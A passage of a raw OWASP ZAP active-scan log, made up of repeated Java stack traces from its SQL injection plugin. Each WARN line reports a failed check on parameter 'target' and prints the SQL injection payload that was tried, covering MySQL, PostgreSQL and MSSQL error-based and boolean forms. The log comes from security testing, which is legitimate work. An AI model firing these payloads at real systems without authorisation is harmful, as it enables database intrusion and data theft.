org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685380 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (9520=9520) THEN 9520 ELSE 9520*(SELECT 9520 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685380 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' AND (SELECT 2159 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2159=2159,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685381 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6891=7242) THEN 6891 ELSE 6891*(SELECT 6891 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685382 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND (SELECT 8714 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8714=8714,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- CwAJ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685383 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) AND 4878=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4878=4878) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (2218=2218] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685384 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 4507=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4507=4507) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685385 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') AND 9106=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9106=9106) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('yuZL'='yuZL] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685387 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' AND 1815=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1815=1815) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'KjZw'='KjZw] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685388 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' AND 2620=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2620=2620) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685389 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 4842=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4842=4842) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- ycIR] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685391 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) AND 4281=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4281=4281) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (4055=4055] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685392 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 2992=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2992=2992) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685393 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') AND 1906=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1906=1906) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('CBto'='CBto] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685396 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' AND 5664=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5664=5664) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'GxKG'='GxKG] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685398 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' AND 5584=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5584=5584) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685399 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 3598=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3598=3598) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- jGQR] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 